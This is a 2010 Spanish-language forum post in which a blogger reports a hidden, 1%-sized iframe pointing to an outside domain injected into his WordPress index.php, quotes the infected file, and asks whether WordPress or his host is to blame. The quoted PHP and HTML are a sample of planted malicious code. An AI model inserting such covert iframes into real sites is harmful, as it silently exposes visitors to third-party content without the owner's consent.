Ver Mensaje Individual
  #1 (permalink)  
Antiguo 16/12/2010, 15:20
Avatar de rogertm
rogertm
Mod->Cuba
 
Fecha de Ingreso: julio-2005
Ubicación: /home/Cuba/Habana/rogertm/
Mensajes: 2.922
Antigüedad: 19 años, 4 meses
Puntos: 638
Se me coló un "marine" y me colgó un iframe...

Woow... mientras estaba corrigiendo algunos warnings en mi blog, me di cuenta que tenía algo mal en él, fui a ver mi código fuente, osea, el html devuelto por el navegador y me encuentro con esto:
Código HTML:
Ver original
  1. <iframe src="http://www.bestwebcam.cz.cc" scrolling="auto" width=1% height=1% frameborder="0"> </iframe>
Mir'e por mi footer.php y mi index.php en mi theme y nada, entonces decidí entrar a mi host y en el index.php de wordpress tenía esto:
Código PHP:
Ver original
  1. <?php
  2. /**
  3.  * Front to the WordPress application. This file doesn't do anything, but loads
  4.  * wp-blog-header.php which does and tells WordPress to load the theme.
  5.  *
  6.  * @package WordPress
  7.  */
  8.  
  9. /**
  10.  * Tells WordPress to load the WordPress theme and output it.
  11.  *
  12.  * @var bool
  13.  */
  14. define('WP_USE_THEMES', true);
  15.  
  16. /** Loads the WordPress Environment and Template */
  17. require('./wp-blog-header.php');
  18. $varri = "http://www.bestwebcam.cz.cc";
  19.  
  20. ?>
  21.  
  22. <iframe src=<?php print $varri; ?> scrolling="auto" width=1% height=1% frameborder="0"> </iframe>
¿Es una bulnerabilidad de WP o tengo que llamar a mi administrador de hostin para tener una charla con él?
__________________
Friki y Blogger por Cuenta Propia:213
Twenty'em: Theming is Prose